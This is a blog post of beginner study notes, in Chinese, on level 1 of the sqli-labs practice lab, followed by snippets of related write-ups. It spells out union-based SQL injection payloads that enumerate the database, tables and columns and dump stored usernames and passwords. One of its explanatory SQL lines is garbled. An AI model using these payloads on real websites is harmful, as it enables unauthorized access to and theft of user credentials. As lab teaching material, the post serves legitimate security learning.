SQL注入——Less-1(学习笔记)

最新推荐文章于 2024-12-04 22:24:29 发布
原创 最新推荐文章于 2024-12-04 22:24:29 发布 · 733 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql注入

本文介绍了SQL注入的基础知识,通过一个实例展示了如何利用字符型注入漏洞进行数据库探测。通过在URL参数?id=1后添加特殊字符,判断注入存在,并通过ORDER BY和UNION SELECT等操作确定字段数、库名、表名和字段,最终获取敏感信息。

首先我们需要了解什么是数据库注入以及其原理,我会在后面的文章中更新内容
下面进去sql-less的第一关 字符型注入漏洞

进入页面之后就是这个页面在?id=1后面加上单引号来判断是否存在注入漏洞
在这里插入图片描述
但是其页面返回错误那么加上一个注释符–+返回以下页面
在这里插入图片描述
可以看到加上注释符后页面返回正常那么接下来我们使用 roder by *来判断该注入漏洞存在字段数

在这里插入图片描述
在这里插入图片描述

可以看到在测试order by 3返回正常但是在测试order by4返回错误那么由此判断存在3个字段数,接下来我们使用以下代码查询数据库库名

?id=-1' union select 1,2,database()

可以看一下数据库的执行语句//方便理解,记录一下这里为什么要用-1,这是因为union select 的结果代码只返回第一条结果,所以union select 获取的结果没有输出到页面,可以通过设置参数ID只让服务端返回nuion select的结果。如:把ID设置为-1这样数据库中没有id=-1得到数据,则会返回nuion select 的结果

select union from * users where id =1 union selct 1,2,database()

在这里插入图片描述

获得了数据库库名security,接下来获取数据库表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

这条语句我是这样理解的,利用函数group_concat查询table_name从 information_schema数据库的下一级tables查询条件为table_schema里查询’security’
在这里插入图片描述

获取到表名显然users价值要大的多,那么接下来查询该表中的字段名


?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

在这里插入图片描述

得知表名字段名那么就可以获取数据了首先获取账户

?id=-1' union select 1,2,group_concat(username) from security.users--+

在这里插入图片描述

获取密码

?id=-1' union select 1,2,group_concat(password) from security.users--+

在这里插入图片描述

通关,第二关和第一关一样只是一个是字符型注入一个是整数型注入

SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 2225
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
初学SQL注入Less-1
AmyBaby00的博客
08-08 1056
字符型(单引号,小括号,双引号…)注意闭合 练习一、单引号闭合 1、 http://127.0.0.1/sqli/Less-1/index.php?id=1 http://127.0.0.1/sqli/Less-1/index.php?id=1' 备注:对特殊字符的过滤,是一种简单的防护 http://127.0.0.1/sqli/Less-1/index.php?id=2’ and 1=2 ...
网络安全之sql注入-less1
koala_king的博客
08-17 1527
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
SQL注入——sqli-labs(Less-1
E-Malon的博客
05-29 529
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
SQL注入less-1
m0_62903168的博客
05-03 1424
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
sqli-Less1
qq_44060093的博客
04-19 601
最近准备拾起sql注入sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 888
继续学习sqli-labs,本篇是less 32-37
冬令营线上直播学习笔记4——SQL注入报错注入
ISNS的博客
02-22 460
一、理论知识 1.什么是报错注入? 在MySQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库的报错信息,在语法输入错误的时候将信息输出前端显示,我们可以从报错信息中获取信息。 2.报错注入常用的函数 updatexml():xml文档数据进行查询和修改的XPATH函数 extractvalue():xml文档数据进行查询和修改的XPATH函数 floor():数据库中取整的函数 二、实验 这...
SQL注入基础学习(笔记)
部分学习记录
07-29 789
此文为自己学习SQL注入基础的笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们一点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了一个单引号,推测输入内容为单引号引起来的字
sql注入教程:报错注入与二阶攻击策略
本篇自学笔记详细探讨了SQL注入中的一个重要技术手段——报错注入。报错注入利用的是Web应用程序中未关闭或过滤错误处理功能的情况,攻击者通过构造恶意SQL语句,迫使服务器在执行时返回错误信息,从而间接获取敏感...
sql注入系列Sqli-labs(less-1)
BetsyMyGirl的博客
11-30 2342
判断注入点 http://192.168.81.210/sqli/Less-1/?id=1’输入单引号出现报错,从报错语句中可以猜测后端代码为 select user from users where id='1' limit 0,1 当输入了一个单引号语句就变成了 select user from users where id='1'' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2308
SQL注入闯关
Sql注入-Less-1
dahege666的博客
04-02 505
一、环境搭建 apache+mysql+php Tomcat+mysql+java(部分关卡需要) 如果可以的话,推荐在 windows 和 linux 下分别安装: Windows 下可以用 wamp、phpstudy、apmserv 等直接安装,linux 下可在网上搜索教程进行 安装。我 的测 试 环 境 是 windows 下 用 phpstudy 直 接 搭 建 的. sqli-l...
mysql注入less-1
MIGENGKING的博客
07-19 452
我们在PHPstudy软件搭好环境后,打开PHPstudy并访问:http://127.0.0.1链接 并找到相关目录(我的目录为sqli-labs-master): 点进去往下拉就找到第一道题: 打开题目我们可以看到: 然后我们可以在“ http://127.0.0.1/sqllib/Less-1/”后面直接添加一个 “?id=1”, 来看一下效果: 输入“?id=1”之后我们就得到了题目...
MySQL数据库笔记1
jia1083661的博客
11-21 328
查看服务器中的所有数据库 show databases; 选择某一个数据库操作 在这里插入代码片
sqli-labs,sql注入靶场less1less2 全网最详细,每条命令都有详解,最完整解析
最新发布
2401_89478347的博客
12-04 1572
5、拿到数据库名字后利用mysql自带的系统数据库information_schema来查看当前所有数据库的名字,information_schema这个数据库里面包含了所有数据库的名字,schema_name是系统数据库information_schema中的一个字段,即列,该列包含了当前mysql下所有数据库的名字,group_concat()函数是为了将所有数据库的名字合并成一个字符串返回,该函数会将各个数据库的名字用逗号隔开来返回。
MySQL注入-SQLi-Less1笔记
游离态De猫
07-06 506
MySQL注入-SQLi-Less1
SQL注入sqli-labs靶场less-1演示)
weixin_57448301的博客
04-22 569
SQLI-LABS LESS-1 get显错注入、get盲注、报错注入步骤详解
sql注入 Less-26-31
lyy0xfff的博客
07-23 499
ContentsPreface本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!!Less-26Less-26aLess-27Less-27aLess-28Less-28aLess-29Less-30 Preface 本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!! Less-26 0x00 由题干我们知道,它对我们的空格和一些内容进行了过滤,经过我尝试,我发现,它过滤了我们的 and 、or 、 # 、– 因为空格无法进行双写,所以我们必须要想办法绕过空格过滤 首先我们根据题目
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

超级滑稽帝本人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值